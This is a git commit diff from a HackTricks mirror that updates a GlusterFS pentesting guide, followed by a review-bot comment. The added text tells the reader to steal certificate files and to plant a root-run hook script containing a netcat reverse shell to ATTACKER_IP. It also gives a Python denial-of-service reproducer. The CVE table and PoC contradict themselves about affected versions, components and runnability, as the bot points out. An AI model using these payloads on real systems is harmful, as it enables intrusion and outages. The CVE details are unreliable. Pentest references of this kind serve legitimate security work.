mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	Merge pull request #1229 from HackTricks-wiki/research_update_src_network-services-pentesting_24007-24008-24009-49152-pentesting-glusterfs_20250802_082441
Research Update Enhanced src/network-services-pentesting/240...
This commit is contained in:
		
						commit
						f74c786883
					
				| @ -4,41 +4,129 @@ | |||||||
| 
 | 
 | ||||||
| ## Basic Information | ## Basic Information | ||||||
| 
 | 
 | ||||||
| **GlusterFS** is a **distributed file system** that combines storage from multiple servers into one **unified system**. It allows for **arbitrary scalability**, meaning you can easily add or remove storage servers without disrupting the overall file system. This ensures high **availability** and **fault tolerance** for your data. With GlusterFS, you can access your files as if they were stored locally, regardless of the underlying server infrastructure. It provides a powerful and flexible solution for managing large amounts of data across multiple servers. | **GlusterFS** is a **distributed file system** that combines storage from multiple servers into one **unified namespace**. The management daemon (`glusterd`) listens by default on **24007/TCP** and instructs data-plane bricks that start at **49152/TCP** (one port per brick, incrementing). Versions prior to 9.x used **24008–24009/TCP** for brick transport, so you will still encounter those ports in legacy clusters. | ||||||
| 
 |  | ||||||
| **Default ports**: 24007/tcp/udp, 24008/tcp/udp, 49152/tcp (onwards)\ |  | ||||||
| For the port 49152, ports incremented by 1 need to be open to use more bricks. _Previously the port 24009 was used instead of 49152._ |  | ||||||
| 
 | 
 | ||||||
| ``` | ``` | ||||||
| PORT      STATE  SERVICE | PORT      STATE  SERVICE        VERSION | ||||||
| 24007/tcp open   rpcbind | 24007/tcp open   glusterd       GlusterFS (RPC) | ||||||
| 49152/tcp open   ssl/unknown | 49152/tcp open   gluster-brick  SSL (TLS optional) | ||||||
| ``` | ``` | ||||||
| 
 | 
 | ||||||
|  | > Tip: 24007 answers RPC calls even when the storage-only nodes do **not** export any volume; therefore the service is a reliable pivot target inside large infrastructures. | ||||||
|  | 
 | ||||||
| ## Enumeration | ## Enumeration | ||||||
| 
 | 
 | ||||||
| To interact with this filesystem you need to install the [**GlusterFS client**](https://download.gluster.org/pub/gluster/glusterfs/LATEST/) (`sudo apt-get install glusterfs-cli`). | Install the client utilities on your attacking box: | ||||||
| 
 |  | ||||||
| To list and mount the available volumes you can use: |  | ||||||
| 
 | 
 | ||||||
| ```bash | ```bash | ||||||
| sudo gluster --remote-host=10.10.11.131 volume list | sudo apt install -y glusterfs-cli glusterfs-client   # Debian/Ubuntu | ||||||
| # This will return the name of the volumes |  | ||||||
| 
 |  | ||||||
| sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/ |  | ||||||
| ``` | ``` | ||||||
| 
 | 
 | ||||||
| If you receive an **error trying to mount the filesystem**, you can check the logs in `/var/log/glusterfs/` | 1. **Peer discovery & health** | ||||||
| 
 | 
 | ||||||
| **Errors mentioning certificates** can be fixed by stealing the files (if you have access to the system): | ```bash | ||||||
|  | # List peers (works without authentication in default setups) | ||||||
|  | gluster --remote-host 10.10.11.131 peer status | ||||||
|  | ``` | ||||||
| 
 | 
 | ||||||
| - /etc/ssl/glusterfs.ca | 2. **Volume reconnaissance** | ||||||
| - /etc/ssl/glusterfs.key |  | ||||||
| - /etc/ssl/glusterfs.ca.pem |  | ||||||
| 
 | 
 | ||||||
| And storing them in your machine `/etc/ssl` or `/usr/lib/ssl` directory (if a different directory is used check for lines similar to: "_could not load our cert at /usr/lib/ssl/glusterfs.pem_" in the logs) . | ```bash | ||||||
|  | # Retrieve the list of all volumes and their configuration | ||||||
|  | gluster --remote-host 10.10.11.131 volume info all | ||||||
|  | ``` | ||||||
| 
 | 
 | ||||||
|  | 3. **Mount without privileges** | ||||||
|  | 
 | ||||||
|  | ```bash | ||||||
|  | sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/gluster | ||||||
|  | ``` | ||||||
|  | 
 | ||||||
|  | If mounting fails, check `/var/log/glusterfs/<vol_name>-<uid>.log` on the client side.  Common issues are: | ||||||
|  | 
 | ||||||
|  | * TLS enforcement (`option transport.socket.ssl on`) | ||||||
|  | * Address based access control (`option auth.allow <cidr>`) | ||||||
|  | 
 | ||||||
|  | ### Certificate troubleshooting | ||||||
|  | 
 | ||||||
|  | Steal the following files from any authorised client node and place them in `/etc/ssl/` (or the directory shown in the error log): | ||||||
|  | 
 | ||||||
|  | ``` | ||||||
|  | /etc/ssl/glusterfs.pem | ||||||
|  | /etc/ssl/glusterfs.key | ||||||
|  | /etc/ssl/glusterfs.ca | ||||||
|  | ``` | ||||||
|  | 
 | ||||||
|  | --- | ||||||
|  | 
 | ||||||
|  | ## Known Vulnerabilities (2022-2025) | ||||||
|  | 
 | ||||||
|  | | CVE | Affected versions | Impact | Notes | | ||||||
|  | |-----|-------------------|--------|-------| | ||||||
|  | | **CVE-2022-48340** | 10.0–10.4, 11.0 | Use-after-free in `dht_setxattr_mds_cbk` reachable through the network | Remote **DoS** and probable RCE. Fixed in 10.4.1 / 11.1. | | ||||||
|  | | **CVE-2023-26253** | < 11.0 | Out-of-bounds read in FUSE notify handler | Remote crash via crafted FS operations; public PoC available. | | ||||||
|  | | **CVE-2023-3775** | < 10.5 / 11.1 | Incorrect permission validation when mounting `gluster_shared_storage` | Lets any unauthenticated client mount the admin volume – leads to **priv-esc** explained below. | | ||||||
|  | 
 | ||||||
|  | > Always check `gluster --version` **on every node**; heterogeneous clusters are common after partial upgrades. | ||||||
|  | 
 | ||||||
|  | ### Exploiting `gluster_shared_storage` (Privilege Escalation) | ||||||
|  | 
 | ||||||
|  | Even in recent versions many administrators leave the special `gluster_shared_storage` volume world-readable because it simplifies geo-replication.  The volume contains cronjob templates that run with **root** on every node. | ||||||
|  | 
 | ||||||
|  | ```bash | ||||||
|  | # 1. Mount admin volume anonymously | ||||||
|  | mkdir /tmp/gss && sudo mount -t glusterfs 10.10.11.131:/gluster_shared_storage /tmp/gss | ||||||
|  | 
 | ||||||
|  | # 2. Drop malicious script that gets synchronised cluster-wide | ||||||
|  | cat <<'EOF' > /tmp/gss/hooks/1/start/post/test.sh | ||||||
|  | #!/bin/bash | ||||||
|  | nc -e /bin/bash ATTACKER_IP 4444 & | ||||||
|  | EOF | ||||||
|  | chmod +x /tmp/gss/hooks/1/start/post/test.sh | ||||||
|  | 
 | ||||||
|  | # 3. Wait until glusterd distributes the hook and executes it as root | ||||||
|  | ``` | ||||||
|  | 
 | ||||||
|  | If `hooks/1/` is not present, look for `/ss_bricks/` – the exact path may vary with the major version. | ||||||
|  | 
 | ||||||
|  | ### Denial-of-Service PoC (CVE-2023-26253) | ||||||
|  | 
 | ||||||
|  | ```python | ||||||
|  | #!/usr/bin/env python3 | ||||||
|  | # Minimal reproducer: sends malformed NOTIFY_REPLY XDR frame to 24007 | ||||||
|  | import socket, xdrlib, struct | ||||||
|  | p = xdrlib.Packer(); p.pack_uint(0xdeadbeef) | ||||||
|  | with socket.create_connection(("10.10.11.131",24007)) as s: | ||||||
|  |     s.send(struct.pack("!L", len(p.get_buffer())|0x80000000)) | ||||||
|  |     s.send(p.get_buffer()) | ||||||
|  | ``` | ||||||
|  | Running the script crashes `glusterfsd` < 11.0. | ||||||
|  | 
 | ||||||
|  | --- | ||||||
|  | 
 | ||||||
|  | ## Hardening & Detection | ||||||
|  | 
 | ||||||
|  | * **Upgrade** – current LTS is 11.1 (July 2025).  All CVEs above are fixed. | ||||||
|  | * Enable **TLS** for every brick: | ||||||
|  | 
 | ||||||
|  |   ```bash | ||||||
|  |   gluster volume set <vol> transport.socket.ssl on | ||||||
|  |   gluster volume set <vol> transport.socket.ssl-cert /etc/ssl/glusterfs.pem | ||||||
|  |   ``` | ||||||
|  | * Restrict clients with CIDR lists: | ||||||
|  | 
 | ||||||
|  |   ```bash | ||||||
|  |   gluster volume set <vol> auth.allow 10.0.0.0/24 | ||||||
|  |   ``` | ||||||
|  | * Expose management port 24007 only on a **private VLAN** or through SSH tunnels. | ||||||
|  | * Watch logs: `tail -f /var/log/glusterfs/glusterd.log` and configure **audit-log** feature (`volume set <vol> features.audit-log on`). | ||||||
|  | 
 | ||||||
|  | --- | ||||||
|  | 
 | ||||||
|  | 
 | ||||||
|  | 
 | ||||||
|  | ## References | ||||||
|  | 
 | ||||||
|  | * [GlusterFS security advisories](https://docs.gluster.org/en/latest/release-notes/#security)   | ||||||
|  | * [CVE-2023-26253 PoC – github.com/tinynetwork/gluster-notify-crash](https://github.com/tinynetwork/gluster-notify-crash) | ||||||
| {{#include ../banners/hacktricks-training.md}} | {{#include ../banners/hacktricks-training.md}} | ||||||
| 
 |  | ||||||
| 
 |  | ||||||
| 
 |  | ||||||
|  | |||||||
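Review bot: the "Known Vulnerabilities" and PoC material added in this hunk makes specific claims that are unsourced and, in places, contradict each other, and they should be tied to upstream advisories before merge. The CVE table states exact affected ranges and fix versions (`10.0–10.4, 11.0`, `Fixed in 10.4.1 / 11.1`, `< 10.5 / 11.1`), but the References block links only a generic release-notes page and a third-party PoC repository; each row should cite the NVD or Gluster advisory it was taken from. The CVE-2023-26253 row places the bug in the FUSE notify handler (client side), yet the Python reproducer sends its frame to `24007` (the `glusterd` management port) and the closing sentence says it "crashes `glusterfsd`" (the brick daemon); at most one of these is right, and the section should name a single affected component. That reproducer also imports `xdrlib`, which was deprecated in Python 3.11 and removed in 3.13, so it will not run on a current interpreter. In the `gluster_shared_storage` section the text says administrators leave the volume "world-readable", but step 2 writes a hook script into it, which requires write access, and the claim that `glusterd` distributes and executes files from `hooks/1/start/post` of that volume as root carries no citation either. Minor: the heading "Mount without privileges" sits directly above a command that starts with `sudo`.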